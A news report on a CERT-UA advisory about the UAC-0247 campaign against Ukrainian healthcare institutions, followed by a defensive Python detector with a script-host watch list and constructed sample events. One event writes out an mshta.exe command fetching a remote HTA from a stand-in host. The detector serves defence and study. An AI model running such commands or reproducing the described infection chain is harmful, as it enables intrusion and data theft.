
Ukraine’s Computer Emergency Response Team (CERT-UA) has revealed details of a new campaign targeting government and municipal healthcare institutions, primarily clinics and emergency hospitals, distributing malware that can steal sensitive data from Chromium-based web browsers and WhatsApp.
This activity was observed between March and April 2026 and is believed to be the work of a threat cluster tracked as UAC-0247. The origins of this campaign are currently unknown.
According to CERT-UA, the attack chain begins with an email message purporting to offer humanitarian aid, prompting recipients to click on a link that redirects them to a legitimate website compromised by a cross-site scripting (XSS) vulnerability, or to a fake site created with the help of artificial intelligence (AI) tools.
Whichever site is used, the goal is to have the victim download and run a Windows Shortcut (LNK) file, which then uses the native Windows utility “mshta.exe” to run a remote HTML Application (HTA). The HTA file displays a decoy form to distract the victim while fetching a binary that injects shellcode into legitimate processes (such as ‘runtimeBroker.exe’).
“At the same time, recent campaigns have recorded the use of a two-stage loader, the second stage of which is implemented using a proprietary executable file format (with complete support for code and data sections, importing functions from dynamic libraries, and relocation), and the final payload is further compressed and encrypted,” CERT-UA said.
One of the stagers is a TCP reverse shell (or equivalent tool) tracked as RAVENSHELL. It establishes a TCP connection to the management server and uses “cmd.exe” to execute the commands it receives on the host.
Infected machines also download a malware family called AINGFLY and a PowerShell script called SILENTLOOP. The script can run commands, update its settings automatically, obtain the current IP address of the management server from a Telegram channel, and fall back to an alternative mechanism for determining the command-and-control (C2) address.
Developed in C#, AINGFLY is designed to give the operators remote control of affected systems. It communicates with the C2 server over WebSockets to retrieve commands, and can execute commands, launch a keylogger, download files, and run additional payloads.

An investigation of roughly a dozen incidents found that these attacks are used for reconnaissance, lateral movement, and theft of credentials and other sensitive data from WhatsApp and Chromium-based browsers. This is carried out with a range of open-source tools, including those listed below.
- ChromElevator, a program designed to bypass Chromium’s App-Bound Encryption (ABE) protection and collect cookies and saved passwords
- ZAPiXDESK, a forensic extraction tool that decrypts WhatsApp Web’s local database
- RustScan, a network scanner
- Ligolo-Ng, a lightweight utility that establishes tunnels from reverse TCP/TLS connections
- Chisel, a tool that tunnels network traffic over TCP/UDP
- XMRig, a cryptocurrency miner
The agency said there was evidence to suggest that members of the Ukrainian Armed Forces may also have been targeted as part of the operation. That assessment is based on the distribution, via Signal, of a malicious ZIP archive designed to drop AINGFLY using DLL sideloading.
To reduce the risk from such threats and minimize the attack surface, CERT-UA recommends restricting the execution of LNK, HTA, and JS files, along with legitimate utilities such as ‘mshta.exe’, ‘powershell.exe’, and ‘wscript.exe’.
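A defender-side illustration of the LNK-to-mshta chain described above and of the script-host restriction CERT-UA recommends, added here as an example and not CERT-UA's own code: it flags the named script hosts when they are handed a remote URL, and cmd.exe spawned by an injection-prone process such as RuntimeBroker.exe, over constructed Sysmon-style process-creation events. The event field names, the example hostname, and the parent-process list beyond RuntimeBroker.exe are assumptions.

```python
import re
from urllib.parse import urlparse

# Script hosts named in the CERT-UA recommendation (cscript.exe added as an assumption).
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# Parents that should not normally spawn cmd.exe. RuntimeBroker.exe is the injection
# target named in the advisory; the other two are analyst-chosen assumptions.
UNEXPECTED_SHELL_PARENTS = {"runtimebroker.exe", "svchost.exe", "dllhost.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation events in Sysmon Event ID 1 style; not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\explorer.exe", "parent": r"C:\Windows\System32\userinit.exe",
     "cmdline": "explorer.exe"},
    # A shortcut opened from Explorer handing a remote HTA to mshta.exe (the chain on the page).
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe https://example.invalid/aid-form.hta"},
    # A local HTA run by an installer: not flagged, only remote content is.
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\installer.hta"'},
    # cmd.exe spawned by RuntimeBroker.exe, as a reverse shell running from injected code would.
    {"image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\System32\RuntimeBroker.exe",
     "cmdline": "cmd.exe"},
]

def basename(path):
    """Lower-cased file name of a Windows path, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def assess_event(event):
    """Return (rule_id, detail) findings for one process-creation event."""
    findings = []
    image, parent, cmdline = basename(event["image"]), basename(event["parent"]), event["cmdline"]
    if image in SCRIPT_HOSTS:
        for url in URL_RE.findall(cmdline):
            host = urlparse(url).hostname or "?"
            findings.append(("remote_script_host", f"{image} fetched {host}"))
    if image == "cmd.exe" and parent in UNEXPECTED_SHELL_PARENTS:
        findings.append(("shell_from_injected_process", f"cmd.exe spawned by {parent}"))
    return findings

def scan(events):
    """Run assess_event over a list of events; returns (event_index, finding) pairs."""
    return [(i, f) for i, e in enumerate(events) for f in assess_event(e)]

if __name__ == "__main__":
    for idx, (rule, detail) in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {detail}")
```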
